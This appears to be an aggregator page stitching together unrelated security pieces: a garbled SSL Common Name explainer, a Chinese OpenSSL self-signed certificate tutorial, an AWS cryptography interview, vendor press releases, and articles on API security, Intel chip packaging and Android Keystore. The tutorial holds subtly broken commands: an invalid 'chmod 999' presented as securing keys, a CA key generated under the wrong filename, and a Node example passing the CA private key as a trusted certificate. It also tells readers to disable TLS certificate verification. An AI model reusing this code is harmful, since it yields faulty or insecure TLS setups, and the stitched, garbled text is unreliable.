The standard defines that single SSL Certificates can only use single Common Name. This means an SSL certificate can be used for a single Host Name + Domain Name. In order to solve this limitation Subject Alternative Name is created. SAN is used to defined multi-name or muti Common Names in SSL certificates. SAN is show as separate attribute in SSL Certificates. Here is an example Subject Alternative Name or SAN.


What Is SSL Certificate CN (Common Name) and Usage?
Subject Alternative Name Check Common Name In Firefox

Click tot the lock icon which can be yellow or red.


What Is SSL Certificate CN (Common Name) and Usage?

Then we will click to the Secure Connection


What Is SSL Certificate CN (Common Name) and Usage?
Secure Connection

Click More Information


What Is SSL Certificate CN (Common Name) and Usage?
Click More Information

Click View Certificate


What Is SSL Certificate CN (Common Name) and Usage?
Click View Certificate

Then we can see the line Common Name like below.


What Is SSL Certificate CN (Common Name) and Usage?
Common Name

创建自签名 SSL 数字证书以配置开发测试环境站点 HTTPS 访问

$
0
0
1 什么数字证书(Certificate)

数字证书是一种用于电脑的身份识别机制。由数字证书颁发机构(CA)对使用私钥创建的签名请求文件做的签名(盖章),表示 CA 结构对证书持有者的认可。数字证书拥有以下几个优点:

使用数字证书能够提高用户的可信度 数字证书中的公钥,能够与服务端的私钥配对使用,实现数据传输过程中的加密和解密 在证认使用者身份期间,使用者的敏感个人数据并不会被传输至证书持有者的网络系统上

X.509 证书包含三个文件:key,csr,crt。

key csr crt

在密码学中,X.509 是一个标准,规范了公开秘钥认证、证书吊销列表、授权凭证、凭证路径验证算法等。

浏览器检查一个证书是否仍然有效有两种方法:OCSP (Online Certificate Status Protocol,在线证书状态协议) 和 CRL(Certificate Revoke List,证书吊销列表)。

2 创建自签名的证书

用于生产环境的数字证书,颁发机构(CA)必须是可信的第三方机构。在应用开发过程中,我们可以生成自签名的证书以配置开发或测试环境。

2.1 逐步生成私钥和自签名证书 2.1.1 生成服务器私钥 openssl genrsa -des3 -out server.key 4096 2.1.2 生成证书签名请求 openssl req -new -key server.key -out server.csr

这里要填一大堆东西,注意 Common Name 处应填写你希望使用的网站域名

2.1.3 对上一步生成的证书签名请求进行签名 openssl x509 -req -days 3650 -in server.csr -signkey server.key -out server.crt 2.1.4 生成无需密码的服务器私钥

如果私钥是有密码的,则每次启动 web 服务器都会要求你输入密码。

openssl rsa -in server.key -out server.key.insecure mv server.key server.key.secure mv server.key.insecure server.key

修改证书秘钥的读取权限,确保你的私钥的安全性,因为该证书无法被吊销。

chmod 999 server.key.secure server.key 2.2 一步创建私钥和自签名证书

有一个简单的方法一步创建私钥和自签名请求:

openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout server.key -out server.crt

输入信息参考:

writing new private key to 'server.key' ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:CN State or Province Name (full name) [Some-State]:GD Locality Name (eg, city) []:GZ Organization Name (eg, company) [Internet Widgits Pty Ltd]:lzwme Organizational Unit Name (eg, section) []:blog Common Name (e.g. server FQDN or YOUR name) []:*.lzw.me Email Address []:webmaster@lzw.me

以上所有操作中, server.key 为私钥, server.crt 为证书。

3 创建私有 CA 证书,并创建用该 CA 证书签名的证书 3.1 生成 CA 私钥(ca.key)和 CA 证书(ca.crt)

CA 证书就是一个自签名的证书,只是在 Common Name 处可以随意填写。

openssl genrsa -out server.key 2048 openssl req -new -x509 -days 3650 -key ca.key -out ca.crt // 或者一步生成 openssl req -x509 -nodes -days 3650 -newkey rsa:2048 -keyout ca.key -out ca.crt 3.2 生成服务器使用的私钥(server.key)和证书签名请求文件(server.csr) openssl genrsa -out server.key 2048 openssl req -new -key server.key -out server.csr

注意,这里的 Common Name 应当和希望使用的域名或 IP 相同。

3.3 使用 CA 私钥和证书对 server 证书签名 openssl x509 -req -days 3650 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt 4 网站服务器配置使用自签名的证书

nginx 配置和正常的 https 站点配置相同,主要信息参考:

server { listen 443 ssl; ssl on; ssl_certificate /path/to/server.crt; ssl_certificate_key /path/to/server.key; server_name test.lzw.me; }

自建 nodejs server 参考:

const https = require('https'); const fs = require('fs'); const path = require('path'); const server = https.createServer({ key: fs.readFileSync(path.join(__dirname, './ssl/server.key'), 'utf8'), cert: fs.readFileSync(path.join(__dirname, './ssl/server.crt'), 'utf8'), ca: [fs.readFileSync(path.join(__dirname, './ssl/ca.key'),'utf8')], }, app); 5 用户端添加 CA 证书为 受信任的根证书颁发机构

用户端的机器上,需将 ca.crt 证书添加为可信颁发机构。方法步骤大致如下:

双击 ca.crt -> 安装证书 -> 本地计算机 -> 选择“将所有的证书都放入下列存储” -> 浏览 -> 受信任的根证书颁发机构 -> 确定。

6 相关问题 6.1 如何查看各种证书的信息

以下为一些常见的查看证书相关信息的方法。

openssl rsa -noout -text -in server.key 查看私钥信息 openssl req -noout -text -in server.csr 查看签名请求信息 openssl rsa -noout -text -in ca.key 查看ca的私钥信息 openssl x509 -noout -text -in ca.crt 查看证书信息 openssl crl -text -in xx.crl 查看一个证书吊销列表信息 openssl x509 -purpose -in cacert.pem 查看一个证书的额外信息 openssl rsa -in key.pem -pubout -out pubkey.pem 从一个私钥里面提取出公钥 openssl rsa -noout -text -pubin -in apache.pub 查看一个公钥的信息 openssl verify -CAfile 指定CA文件路径 apache.crt 验证一个证书是否是某一个CA签发 openssl s_client -connect 192.168.20.51:443 模拟一个ssl客户端访问ssl服务器。如果服务端要求客户端提供证书,则在加上 -cert 和 -key 参数。比如 openssl s_client -connect 192.168.20.51:443 -cert client.crt -key client.key openssl pkcs12 -in path.p12 -out newfile.crt.pem -clcerts -nokeys 从p12文件里面提取证书 openssl pkcs12 -in path.p12 -out newfile.key.pem -nocerts -nodes 从p12文件里面提取私钥 6.2 代理软件、应用程序内访问 https 服务报错 Error: self signed certificate

如果正确地添加了 CA 证书为 受信任的根证书颁发机构 ,一般来说应该可以正常使用。如果在应用内访问出现该错误提示,可尝试禁用 SSL 安全验证。以 nodejs 中使用 http.request 为例:

const https = require('https'); const options = { host: 'test.lzw.me', port: 8000, path: '/api/test', // Add these next lines rejectUnauthorized: false, requestCert: true, agent: false, secure: false, }; https.request(options, function(res) { res.pipe(process.stdout); }).end(); 相关参考 https://blog.csdn.net/sdcxyz/article/details/47220129 https://blog.csdn.net/h330531987/article/details/74991694

AWS Security Profile (and re:Invent 2018 wrap-up): Eric Docktor, VP of AWS Crypt ...

$
0
0

AWS Security Profile (and re:Invent 2018 wrap-up): Eric Docktor, VP of AWS Crypt ...

We sat down with Eric Docktor to learn more about his 19-year career at Amazon, what’s new with cryptography, and to get his take on this year’s re:Invent conference. (Need a re:Invent recap? Check out this post by AWS CISO Steve Schmidt.)

How long have you been at AWS, and what do you do in your current role?

I’ve been at Amazon for over nineteen years, but I joined AWS in April 2015. I’m the VP of AWS Cryptography, and I lead a set of teams that develops services related to encryption and cryptography. We own three services and a tool kit: AWS Key Management Service (AWS KMS), AWS CloudHSM , AWS Certificate Manager , plus the AWS Encryption SDK that we produce for our customers.

Our mission is to help people get encryption right. Encryption algorithms themselves are open source, and generally pretty well understood. But just implementing encryption isn’t enough to meet security standards. For instance, it’s great to encrypt data before you write it to disk, but where are you going to store the encryption key? In the real world, developers join and leave teams all the time, and new applications will need access to your data―so how do you make a key available to those who really need it, without worrying about someone walking away with it?

We build tools that help our customers navigate this process, whether we’re helping them secure the encryption keys that they use in the algorithms or the certificates that they use in asymmetric cryptography.

What did AWS Cryptography launch at re:Invent?

We’re really excited about the launch of KMS custom key store . We’ve received very positive feedback about how KMS makes it easy for people to control access to encryption keys. KMS lets you set up IAM policies that give developers or applications the ability to use a key to encrypt or decrypt, and you can also write policies which specify that a particular application―like an Amazon EMR job running in a given account―is allowed to use the encryption key to decrypt data. This makes it really easy to encrypt data without worrying about writing massive decrypt jobs if you want to perform analytics later.

But, some customers have told us that for regulatory or compliance reasons, they need encryption keys stored in single-tenant hardware security modules (HSMs) that they manage. This is where the new KMS custom key store feature comes in. Custom key store combines the ease of using KMS with the ability to run your own CloudHSM cluster to store your keys. You can create a CloudHSM cluster and link it to KMS. After setting that up, any time you want to generate a new master key, you can choose to have it generated and stored in your CloudHSM cluster instead of using a KMS multi-tenant HSM. The keys are stored in an HSM under your control, and they never leave that HSM. You can reference the key by its Amazon Resource Name (ARN), which allows it to be shared with users and applications, but KMS will handle the integration with your CloudHSM cluster so that all crypto operations stay in your single-tenant HSM.

You can read our blog post about custom key store for more details.

If both AWS KMS and AWS CloudHSM allow customers to store encryption keys, what’s the difference between the services?

Well, at a high level, sure, both services offer customers a high level of security when it comes to storing encryption keys in FIPS 140-2 validated hardware security modules . But there are some important differences, so we offer both services to allow customers to select the right tool for their workloads.

AWS KMS is a multi-tenant, managed service that allows you to use and manage encryption keys. It is integrated with over 50 AWS services, so you can use familiar APIs and IAM policies to manage your encryption keys, and you can allow them to be used in applications and by members of your organization. AWS CloudHSM provides a dedicated, FIPS 140-2 Level 3 HSM under your exclusive control, directly in your Amazon Virtual Private Cloud (VPC). You control the HSM, but it’s up to you to build the availability and durability you get out of the box with KMS. You also have to manage permissions for users and applications.

Other than helping customers store encryption keys, what else does the AWS Cryptography team do?

You can use CloudHSM for all sorts of cryptographic operations, not just key management. But we definitely do more than KMS and CloudHSM!

AWS Certificate Manager (ACM) is another offering from the cryptography team that’s popular with customers, who use it to generate and renew TLS certificates. Once you’ve got your certificate and you’ve told us where you want it deployed, we take care of renewing it and binding the new certificate for you. Earlier this year, we extended ACM to support private certificates as well, with the launch of ACM Private Certificate Authority .

We also helped the AWS IoT team launch support for cryptographically signing software updates sent to IoT devices . For IoT devices, and for software installation in general, it’s a best practice to only accept software updates from known publishers, and to validate that the new software has been correctly signed by the publisher before installing. We think all IoT devices should require software updates to be signed, so we’ve made this really easy for AWS IoT customers to implement.

What’s the most challenging part of your job?

We’ve built a suite of tools to help customers manage encryption, and we’re thrilled to see so many customers using services like AWS KMS to secure their data. But when I sit down with customers, especially large customers looking seriously at moving from on-premises systems to AWS, I often learn that they have years and years of investment into their on-prem security systems. Migrating to the cloud isn’t easy. It forces them to think differently about their security models. Helping customers think this through and map a strategy can be challenging, but it leads to innovation―for our customers, and for us. For instance, the idea for KMS custom key store actually came out of a conversation with a customer!

What’s your favorite part of your job?

Ironically, I think it’s the same thing! Working with customers on how they can securely migrate and manage their data in AWS can be challenging, but it’s really rewarding once the customer starts building momentum. One of my favorite moments of my AWS career was when Goldman Sachs went on stage at re:Invent last year and talked about how they use KMS to secure their data.

Five years from now, what changes do you think we’ll see within the field of encryption?

The cryptography community is in the early stages of developing a new cryptographic algorithm that will underpin encryption for data moving across the internet. The current standard is RSA, and it’s widely used. That little padlock you see in your web browser telling you that your connection is secure uses the RSA algorithm to set up an encrypted connection between the website and your browser. But, like all good things, RSA’s time may be coming to an end―the quantum computer could be its undoing. It’s not yet certain that quantum computers will ever achieve the scale and performance necessary for practical applications, but if one did, it could be used to attack the RSA algorithm. So cryptographers are preparing for this. Last year, the National Institute of Standards and Technology (NIST) put out a call for algorithms that might be able to replace RSA, and got 68 responses. NIST is working through those ideas now and will likely select a smaller number of algorithms for further study. AWS participated in two of those submissions and we’re keeping a close eye on NIST’s process. New cryptographic algorithms take years of testing and vetting before they make it into any standards, but we want to be ready, and we want to be on the forefront. Internally, we’re already considering what it would look like to make this change. We believe it’s our job to look around corners and prepare for changes like this, so our customers don’t have to.

What’s the most common misconception you encounter about encryption?

Encryption technology itself is decades-old and fairly well understood. That’s both the beauty and the curse of encryption standards: By the time anything becomes a standard, there are years and years of research and proof points into the stability and the security of the algorithm. But just because you have a really good encryption algorithm that takes an encryption key and a piece of data you want to secure and spits out an impenetrable cipher text, it doesn’t mean that you’re done. What did you do with the encryption key? Did you check it into source code? Did you write it on a piece of paper and leave it in the conference room? It’s these practices around the encryption that can be difficult to navigate.

Security-conscious customers know they need to encrypt sensitive data before writing it to disk. But, if you want your application to run smoothly, sometimes you need that data in clear text. Maybe you need the data in a cache. But who has access to the cache? And what logging might have accidentally leaked that information while the application was running and interacting with the cache?

Or take TLS certificates. Each TLS certificate has a public piece―the certificate―and a private piece―a private key. If an adversary got ahold of the private key, they could use it to impersonate your website or your API. So, how do you secure that key after you’ve procured the certificate?

It’s practices like this that some customers still struggle with. You have to think about all the places that your sensitive data is moving, and about real-world realities, like the fact that the data has to be unecrypted somewhere . That’s where AWS can help with the tooling.

Which re:Invent session videos would you recommend for someone interested in learning more about encryption?

Ken Beer’s encryption talk is a very popular session that I recommend to people year after year. If you want to learn more about KMS custom key store, you should also check out the video from the LaunchPad event , where we talked with Box about how they’re using custom key store.

People do a lot of networking during re:Invent. Any tips for maintaining those connections after everyone’s gone home?

Some of the people that I meet at re:Invent I get to see again every year. With these customers, I tend to stay in touch through email, and through Executive Briefing Center sessions. That contact is important since it lets us bounce ideas off each other and we use that feedback to refine AWS offerings. One conference I went to also created a Slack channel for attendees―and all the attendees are still on it. It’s quiet most of the time, but people have a way to re-engage with each other and ask a question, and it’ll be just like we’re all together again.

If you had to pick any other job, what would you want to do with your life?

If I could do anything, I’d be a backcountry ski guide. Now, I’m not a good enough skier to actually have this job! But I like being outside, in the mountains. If there was a way to make a living out of that, I would!

Dragos Selected as SC Media 2019 SCADA Security Award Finalist

$
0
0
Dragos’ industrial cybersecurity platform provides comprehensive
asset identification, threat detection, and response HANOVER, Md. (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/Cybersecurity?src=hash” target=”_blank”gt;#Cybersecuritylt;/agt; Dragos, Inc., provider of the industry’s most trusted

industrial

and services, has been recognized as a

finalist in the 2019 SC Media Awards program for best supervisory

control and data acquisition (SCADA) security solution.


Dragos Selected as SC Media 2019 SCADA Security Award Finalist
The

Dragos

provides industrial asset

identification and threat visibility to strengthen security teams’

threat detection, mitigation, and response capabilities. It is an

automated network-monitoring appliance that passively identifies ICS

assets and communications, alerts to malicious activity, and guides

defenders step-by-step if a threat is found. Dragos’ team of expert

practitioners’ knowledge and deep experience are codified and

transferred to its customers, so they are empowered to establish

resilient industrial control systems (ICS) security postures while

learning from the Dragos team every step of the way.

“We are honored to be selected as a finalist in the SC Media Awards

program. The Dragos platform was built from our experience as ICS

security practitioners to meet the real-world needs of ICS defenders,”

says Robert M Lee, CEO and co-founder of Dragos. “There is a shortage of

skilled personnel in industrial cybersecurity, and we appreciate being

recognized for our ability to help as the best SCADA security solution.

Every improvement we make towards protecting and strengthening our

infrastructure means reduced downtime, reduced dwell time, and increased

safety worldwide.”

SC Awards is recognized as the industry standard of accomplishment for

cybersecurity professionals, products, and services. All finalists were

chosen by an expert panel of judges with extensive knowledge and

experience in the cybersecurity industry. To learn more about the 2019

SC Awards, visit https://www.scmagazine.com/2019-sc-awards-finalists/ .

Winners will be announced at the SC Awards ceremony on March 5, 2019, in

San Francisco.

About Dragos

Dragos’ industrial cybersecurity platform delivers unprecedented

visibility and prescriptive procedures to respond to adversaries in the

industrial threat landscape. Dragos codifies intelligence and threat

behavior analytics for effective ICS threat detection and response.

Dragos also offers ICS threat hunting and incident response services, as

well as Dragos ICS WorldView for weekly ICS threat intelligence reports.

Learn more at www.dragos.com ,

or follow us on Twitter

or LinkedIn .

Contacts

Kari Walker for Dragos

703-928-9996

kari@zagcommunications.com
Dragos Selected as SC Media 2019 SCADA Security Award Finalist
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

Agari Recognized as 2019 SC Magazine Awards “Best Email Security Solution” Fin ...

$
0
0
Next-Generation Secure Email Cloud Selected for Ability to Detect,
Defend against and Deter Advanced Email Attacks

FOSTER CITY, Calif. (BUSINESS WIRE) Agari ,

the next-generation Secure Email Cloud that restores trust to the inbox,

today announced that SC Magazine has named Agari as “Best Email Security

Solution” Finalist for the 2019 SC Magazine Awards. In April 2018,

Agari

won the 2018 SC Magazine Award

for “Best Email Security Solution.”
Agari Recognized as 2019 SC Magazine Awards “Best Email Security Solution” Fin ...

“Nobody understands the cybersecurity battle better than the

cybersecurity professionals who work day in and day out to clean up and

protect businesses from malicious attacks,” added Armstrong of SC Media.

“Agari is one of a select few to receive this tremendous recognition of

a Trust Award finalist, and they should be proud of the work this

represents.”

“Agari is proud to be recognized by SC Magazine in two consecutive years

for its ability to provide the best email security solution on the

market,” said Armen Najarian, CMO, Agari. “The Agari Secure Email Cloud

defines the next-generation of email authentication controls, and our

strategy has been validated by our customers, our partners, and―once

again―by the SC Magazine Awards.”

The 2019 SC Magazine Awards “Best Email Security Solution” nominations

were evaluated on their ability to exchange email with assurance, limit

the repercussions of email forgery and to filter unauthorized content,

such as phishing.

The

Agari

is a next-generation solution that uses

predictive AI to detect, defend against and deter advanced email attacks

including Business Email Compromise (BEC), spearphishing, and

account-takeover based attacks. Agari eliminates unauthenticated email,

implements protection against advanced email threats, and automates

incident response to protect business from breaches, fraud, and theft.

The Agari Secure Email Cloud also includes some capabilities found in

legacy SEGs, including URL analysis and attachment analysis.

Now in its 22nd year, SC Awards is recognized as the industry gold

standard of accomplishment for cybersecurity professionals, products and

services. With the awards, SC Media recognizes the achievements of

cybersecurity professionals in the field, the innovations happening in

the vendor and service provider communities, and the vigilant work of

government, commercial and nonprofit entities. Vendors and service

providers who offer a product and/or service for the commercial,

government, educational, nonprofit or other industries are eligible for

the SC Awards’ Trust Award category.

“Every new year brings with it an unpredictable mix of adversity and

opportunity for information security professionals,” said Illena

Armstrong, VP, editorial, SC Media. “In 2018, we watched as ransomware

took down entire city governments, popular online platforms were accused

of mishandling user data, and technology giants announced an

unprecedented industry-wide effort to solve the Spectre and Meltdown CPU

vulnerabilities. Through it all, this year’s SC Awards finalists found

ways to break boundaries, overcome challenges and contribute fresh new

ideas to the world of cybersecurity.”

About Agari

Agari is transforming the legacy Secure Email Gateway with its

next-generation Secure Email Cloud powered by predictive AI. Leveraging

data science and real-time intelligence from trillions of emails, the

Agari Identity Graph detects, defends, and deters costly advanced email

attacks including business email compromise, spear phishing and account

takeover. Winner of the 2018 Best Email Security Solution by SC

Magazine, Agari restores trust to the inbox for government agencies,

businesses, and consumers worldwide. Learn more at www.agari.com .

About SC Media

SC Media is cybersecurity. For 30 years, they have armed information

security professionals with in-depth and unbiased information through

timely news, comprehensive analysis, cutting-edge features,

contributions from thought leaders, and independent product reviews in

partnership with and for top-level information security executives and

their technical teams. In addition to their comprehensive website, SC

Media offers magazines, eBooks, and newsletters. They also host digital

and live events such as SC Awards and RiskSec NY to provide

cybersecurity professionals all the information needed to safeguard

their organizations and contribute to their longevity and success.

Friend us on Facebook: http://www.facebook.com/SCMag

Follow

us on Twitter: http://twitter.com/scmagazine

Contacts

Clinton Karr

agari@summitstrategygroup.net

(415)

993-1010


Agari Recognized as 2019 SC Magazine Awards “Best Email Security Solution” Fin ...
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

Cylance Narrows the Cybersecurity Skills Gap with Virtual CISO

$
0
0
CISO-in-a-Box Offering Helps Security Executives Meet Industry
Standards, Deploy Proven Frameworks, and Adhere to Compliance Regulations IRVINE, Calif. (BUSINESS WIRE) lt;a href=”https://twitter.com/hashtag/artificialintelligence?src=hash” target=”_blank”gt;#artificialintelligencelt;/agt;

Cylance

, the leading provider of AI-driven, prevention-first security

solutions, today announced the availability of its virtual chief

information security officer (vCISO) service, a program designed to

provide organizations with critical technology and security resources

that support next-generation security architectures and offer robust

staff augmentation.


Cylance Narrows the Cybersecurity Skills Gap with Virtual CISO

Cylance vCISO enables customers at organizations large and small tackle

the cybersecurity skills shortage that has long been a problem for

CISOs. In fact, a recent study notes that the skills gap―up by more than

50% in the last three years―is expected to grow by more than two million

by 2019, while the cost of cyber crime is projected to reach $6 trillion

in 2021. Seasoned security experts from Cylance provide organizations

the expertise to detect and prevent cyber attacks without compromising

their ability to deliver on core business objectives.

“Today’s cybersecurity landscape presents CISOs the challenge of trying

to implement digital transformation and other important initiatives

across their organizations without the adequate people or systems in

place to support the complex environments they manage,” said Corey

White, senior vice president of Cylance Consulting. “To meet those

challenges, security leaders require access to expert knowledge on the

fly that helps them identify, assess, and communicate security risks to

their management teams and boards of directors, which in turn helps them

better manage risk and keep the overall costs of security compliance

under control.”

Cylance vCISO taps a broad set of techniques including automation and

artifact analysis to collect information and assess data. It also

defines likely security scenarios to build risk profiles, recommend

actions, and highlight internal strengths, allowing organizations to

customize their approach to prevention-first security without having to

customize all of the technology that supports their security

environments.

Cylance vCISO helps organizations manage day-to-day security needs and

meet common security standards, frameworks, and compliance regulations

such as NIST, ISO/IEC, SANS CIS, and more by assigning experienced

security professionals with discrete expertise in the areas customers

most want to invest in. Personnel work from remote locations or at a

customer’s physical address, depending on the needs and urgency of the

project.

To schedule a consultation with a Cylance vCISO please contact: proservices@cylance.com .

About Cylance Inc.

Cylance develops artificial intelligence to deliver prevention-first,

predictive security products and smart, simple, secure solutions that

change how organizations approach endpoint security. Cylance provides

full spectrum predictive threat prevention and visibility across the

enterprise to combat the most notorious and advanced cybersecurity

attacks. With AI-based malware prevention, threat hunting, automated

detection and response, and expert security services, Cylance protects

the endpoint without increasing staff workload or costs. We call it the

Science of Safe. Learn more at www.cylance.com

Contacts

KC Higgins

Cylance Media Relations

+1 303.434.8163

khiggins@cylance.com
Cylance Narrows the Cybersecurity Skills Gap with Virtual CISO
Do you think you can beat this Sweet post? If so, you may have what it takes to become a Sweetcode contributor...Learn More.

It’s past time to pay much more attention to API security

$
0
0

Organizations manage 363 APIs, on average. But vulnerable APIs can expose your data to anyone who knows how to ask for it. API security starts with the basics.


It’s past time to pay much more attention to API security

The original version of this post was published in Forbes .

It’s obvious that just about every entity with an online presence thinks APIs (application programming interfaces) are pretty cool―and necessary.

A survey by One Poll found that organizations manage an average of 363 different APIs, with 69% of organizations making those APIs accessible not just to their partners but to the public as well.

For good reason. As a description in TechCrunch put it, APIs provide “critical connective tissue andincreasingly important functionality” among software components. That includes rules about how different parts of online applications such as databases and webpages should interact with one another.

Unfortunately, cyber criminals think they’re pretty cool too. Because misconfigured or otherwise vulnerable APIs can amount to the digital version of unlocked doors or broken windows, making just about every “room” in the house available.

Again TechCrunch: “APIs are an attractive target for threat actors because they act as the glue linking different services―they allow data to flow freely from one area to the next, and thus provide a rich vein of information if they are compromised.”


It’s past time to pay much more attention to API security
API attacks on the rise

Jesse Victors, security consultant at Synopsys, said he has seen multiple instances where “an API allows users to log in and authenticate themselves, but doesn’t perform any authorization checks beyond that point. As a result, someone can retrieve information belonging to another user―a privilege escalation.”

That is not a technical problem with the API itself, he said, “but rather an implementation failure to secure it against common and well-known types of attacks.”

There are an alarming number of recent examples.

Just a few weeks ago, security blogger Brian Krebs reported that the U.S. Postal Service had allowed an API weakness that exposed account details for about 60 million users to go unpatched for more than a year after it had been notified about it by a security researcher. The researcher, who wanted to remain anonymous, got so frustrated he eventually contacted Krebs.

Krebs verified the vulnerability, which he said “letany logged-in usps.com userquery the system for account details belonging to any other users, such as email address, username, user ID, account number, street address, phone number, authorized users, mailing campaign data and other information.”

Once Krebs contacted the USPS, the agency fixed the problem, saying in an emailed statement to Threatpost that “the information shared with the Postal Service allowed us to quickly mitigate this vulnerability.”

Quickly―after more than a year of ignoring it.


It’s past time to pay much more attention to API security

Unfortunately, the USPS is not alone. The list of high-profile companies that exposed information on customers due to API problems in just the last few months includes online retail giant Amazon , telecom T-Mobile , food retailer Panera Bread , and the Black Hat security conference , where an attendee hacked his own badge and demonstrated that he could access the data of everybody else who had attended, thanks to a “legacy” (i.e., leaky) API used by theBCard maker, ITN International.

RELATED: These hacks brought to you by ‘leaky’ APIs

Are APIs inherently unsecure?

Does this make APIs the new “weakest link in the security chain”?

Not necessarily. Part of the problem is that there are more―a lot more―of them to secure. “As technologies shift to single-purpose microservices, we are seeing more and more APIs to facilitate that communication, and thus there are more APIs and implementation to configure and secure,” Victors said.

Andrew van der Stock, senior principal consultant at Synopsys, added, “The attack surface is greater simply because of the greater demand for B2B connectivity. The information was always there, but difficult to get at. APIs make the friction of doing business much less, so we expect to see explosive growth of APIs―the business need is just too great to stopper this genie.”


It’s past time to pay much more attention to API security

And Chris Schmidt, senior staff research engineer at Synopsys, said APIs are no weaker than any other component of application development, but have become a more popular target because many were designed to support functionality internally and were therefore protected by “upstream” security controls. But when they are exposed as public, “those controls are no longer present.”

Also, based on recent events, they are probably among the most ignored of security chain links. Nicholas Weaver, researcher at the International Computer Science Institute and lecturer atUniversity of California, Berkeley, told Krebs that implementing access controls is “not even Information Security 101, this is Information Security 1,” and that the failure of the USPS and others to do so was “catastrophically bad.”

Indeed, multiple experts have noted that APIs should enforce both authentication (Who are you?) and authorization (Should you have access to this?) for every request.

Which means that buried in all this bad news is good news: This is a problem that can be fixed, by deploying APIs correctly and with better security testing. Doing the basics, in other words.

How to prevent unsecure APIs

Van der Stock said the security industry needs to “shift left”―start security testing early and continue throughout the development process.


It’s past time to pay much more attention to API security

“They need to adopt the same tooling as developers and write the sort of tests that fully exercise APIs, particularly those that have the potential to extract bulk personal information,” he said.

Victors added that engineers building an API, a protocol, or any other structure should “take the time to consider how their application handles unusual requests. A good place to start would be the 2017 OWASP Top 10 , which lists and describes the most common application risks and is based on an industry analysis of m

Security, Scaling and Power

$
0
0

If anyone has doubts about the slowdown and increasing irrelevance of Moore’s Law, Intel’s official unveiling of its advanced packaging strategy should leave little doubt. Inertia has ended and the roadmap is being rewritten.

Intel’s discussion of advanced packaging is nothing new. The company has been public about its intentions for years, and started dropping hints back when Pat Gelsinger was general manager of Intel’s Digital Enterprise Group. (Gelsinger left Intel in 2009.) Others inside of Intel have discussed packaging plans and advancements since then. The company’s purchase of NoC vendor NetSpeed Systems in September was the glue to make all of these pieces work together.

Intel has been collecting and developing those puzzle pieces for years. The purchase of Altera in 2015 allowed it to add programmability into designs. It also rolled out a die-to-die bridge (Embedded Multi-die Interconnect Bridge, aka EMIB) in 2016. And it has made investments in new memory types such as SSDs (Optane) and phase-change memory (3D XPoint), which potentially could replace L3 cache. All of these moves show just how serious and methodical Intel has been about this whole effort. And while the company has made some very high profile mistakes over the years, such as missing the entire mobile market trend, it has been remarkably consistent about how to continue reaping performance and power benefits from processors.

But all of this is being accelerated now for a couple of main reasons. One involves the power/performance impact of security threats. Speculative execution and branch prediction, two very effective ways of speeding up processors, create security vulnerabilities in hardware. Closing up those vulnerabilities causes a performance hit.

Intel isn’t alone in this. All of the established processor and processor IP companies have been scrambling to close up these security holes. Yet Intel was particularly hard hit because its largest customers―data centers―run their businesses based on performance per watt. A 10% loss of performance translates into added costs, because data centers must add more servers to run the same workloads at the same speed. It also takes more energy to power up and cool those additional servers. And in places like New York, where there is a ceiling on electricity generation and commercial real estate prices are high, that’s not a pleasant discussion to have with your customers.

Second, the benefits of scaling are dwindling. Samsung says that improvements per node after 7nm will be in the range of 20%, and not all of that will come from scaling. While any improvement is still attractive, it may not be enough to warrant regular upgrades by customers. That needs to be supplemented by other improvements, and the most likely sources are architectural and packaging, which is just beginning to mature. Fan-outs, 2.5D and even 3D designs are in use today across a variety of high-volume and niche markets, and the benefits in terms of performance and lower power are proven. The remaining issues are cost and design time, and both of those are being addressed with more flexible platform types of approaches such as chiplets.

Coincidentally and serendipitously, AI is suddenly showing up everywhere, spurred by machine-generated algorithms and the economics of machines doing some things better than people. This is yet another driver of high-performance, low-power design, and it’s a brand new application for which there is no precedent.

What’s not clear yet how chips will be architected to harness AI/ML/DL. While the basic physics of moving data around―or design changes to process more data without moving it―are well understood, the use cases for making this efficient are still evolving. It’s one thing to build a chip that can handle massive data throughput. It’s quite another to do it efficiently. A key problem there is generating enough data to keep all of the processing elements on that chip busy all the time or, alternatively, sizing the chip appropriately.

There are other stumbling blocks, as well. Some processors work better for certain algorithms and data types than others. But because this field is so new, the algorithms are in a state of almost constant change, it’s difficult to design a processor that will work optimally for any significant period of time. Some level of programmability needs to be added into the mix, and architectures need to be flexible enough to handle these changes.

Put all of these factors together and it brings Intel’s recent announcements into focus. Still, these changes reach well beyond just Intel. Intel is a bellwether. But the whole chip world is changing, and the impact on both power and performance across a wide range of applications will be significant and long-lasting.


Google Beefs Up Android Key Security for Mobile Apps

$
0
0

Google Beefs Up Android Key Security for Mobile Apps

Changes to how data is encrypted can help developers ward off data leakage and exfiltration.

Google is making a few tweaks to its tools for Android mobile developers to boost the security of their wares an apropos announcement against the backdrop of recent security issues stemming from poor development practices.

Cryptographical changes this week for Android Keystore give developers more ways to prevent inadvertent exposure of sensitive data to other applications or to the OS, and helps keep data exfiltration at bay.

Keystore provides app developers with a set of hardware-rooted crypto-tools designed to secure user data with a key-based system. Developers can use the Keystore to define which application “secrets” are encrypted, and in what context they can be unlocked.

With the release of Android Pie, Google’s latest mobile OS, developers now have the ability to better protect sensitive information by preventing applications from decrypting keys if the user isn’t using the device.

This is done by the implementation of “keyguard-bound” cryptographic keys, which can be done for any algorithm the developer chooses. The availability of this type of key to perform data decryption is tied directly to the screen-lock state; so, the keys become unavailable as soon as the device is locked, and are only made available again when the user unlocks the device.

“There are times when a mobile application receives data but doesn’t need to immediately access it if the user is not currently using the device,” Google Play researchers said in a posting on Wednesday. “[Now] when the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern or password, any attempt to use these keys will result in an invalid operation.”

This keyguard binding is enforced by the operating system, (since secure hardware has no way to know when the screen is locked), and works as an additional layer to existing hardware-enforced Android Keystore protection features.

Another new feature dubbed Secure Key Import protects sensitive data from being seen by the application or operating system a timely change given the system broadcast vulnerabilities reported earlier this fall.

